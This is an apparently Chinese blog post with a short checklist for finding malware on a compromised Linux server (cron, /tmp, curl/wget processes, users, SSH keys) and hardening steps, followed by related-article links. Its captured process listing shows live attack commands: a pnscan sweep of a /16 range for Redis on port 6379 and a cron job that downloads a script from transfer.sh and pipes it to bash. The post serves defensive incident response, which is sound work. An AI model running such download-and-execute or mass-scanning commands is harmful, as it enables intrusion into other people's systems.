linux查杀病毒的几个思路
1. tmp 目录下面
2. 定时任务查找一下 crontab -e
3. 病毒要下载 ps -ef|egrep "curl|wget" 查看是否有下载的命令
4. top 一下看一下哪个占用cpu最高
5. 查找目标文件 find / -perm 777 目录下777 权限的文件
6. /etc/passwd下面的文件用户哪些可以登录,去掉不正常的可以登录用户/bin/bash
7.查看 /etc/rc.local 用户下面的开机自启动
8. 查看密钥是否被人动了,删除密钥没用的.redis中毒后果.
应对 :
1. cat /etc/hosts.allow 文件设置登录sshd的IP设置.
2.chattr +i 锁定 定时任务 锁定/root/.ssh/auth_key等文件
锁定 /etc/passwd文件
[root@localhost tmp]# ps -ef |grep pnscan
root 29073 5659 10 14:07 ? 00:00:02 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 31.105.0.0/16 6379
root 30141 4684 0 14:07 pts/1 00:00:00 grep pnscan
[root@localhost tmp]# ps -ef|egrep curl
root 5655 5653 0 Apr27 ? 00:00:00 /bin/sh -c curl -s https://transfer.sh/3EqNx/tmp.GewSw5ccS1 > .cmd && bash .cmd
root 7838 4684 0 13:56 pts/1 00:00:00 egrep curl
相关文章
- nagios安装check_linux_stats.pl插件报错Can't locate Sys/Statistics/Linux.pm in @INC的处理?
- Linux安装 微信开发者工具(deepin linux ubt)
- 【Linux】Linux中在mate桌面和gnome桌面root自动登录设置
- linux中iproute2工具介绍
- 【Linux】linux中自动定时备份mysql数据
- 用navicat访问linux数据库,成功实现Navicat访问Linux中安装的MySQL数据库
- linux下批量替换文件内容
- lilybbs-faq - linux入门以及百合 Linux 版精华区导读
- Linux 中高效编写 Bash 脚本的 10 个技巧
- linux服务器安装nodeJS步骤及踩坑记录(解决node -v报错cannot execute binary file: Exec format error的问题 - 在Linux中安装适用于arm64位的nodejs)以及node环境项目部署
- 查询红帽linux/Oracle Linux的发行版本的方法
- Linux awk命令变量设置
- LINUX-SAMBA服务配置
- Linux 之 arm linux 板子与 ubuntu 使用 nfs 进行 mount 挂载进行文件传输的简单整理
- Linux学习笔记(24)linux发邮件 mailx发邮件
- Linux调整日期时间
- 结合jenkins在Linux服务器搭建测试环境
- 【Linux】好玩的linux命令
- DPDK成Linux基金会下开源项目
- Linux laravel安装
- Linux服务器问题排查思路及常用命令
- 《Linux命令行与shell脚本编程大全 第3版》Linux命令行---20
- Linux下汇编语言学习笔记72 ---
- linux学习之防火墙,查看Linux防火墙状态,开启/关闭Linux防火墙,Linux防火墙开放5236端口
- linux安装rclone以及一些常用的命令
- Linux系统安装Docker